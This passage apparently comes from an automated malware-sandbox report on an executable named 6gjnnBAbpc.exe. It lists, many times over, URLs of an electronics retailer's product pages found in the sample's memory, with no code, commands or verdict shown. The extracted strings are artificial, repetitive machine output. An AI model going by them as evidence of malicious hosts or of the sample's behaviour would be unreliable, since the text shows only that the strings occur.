00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-in-regulatorji-calex/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-za-fiksne-infrardece-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/rocni-infrardeci-ir-merilniki-temper
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-termoclenov-za-termoelemente-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/konektorji-za-prikljucitev-temperat
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/zice-temperaturno-obstojne-za-prikl
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracije/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kalibracijski-instrument
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kovcki-za-merilno-opremo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/krmilne-elektro-omarice/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/alarmne-in-napajalne-enote/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/dodatna-oprema-inor/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilni-pretvorniki-inor/izolatorji-signalov-in-izolacijski-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 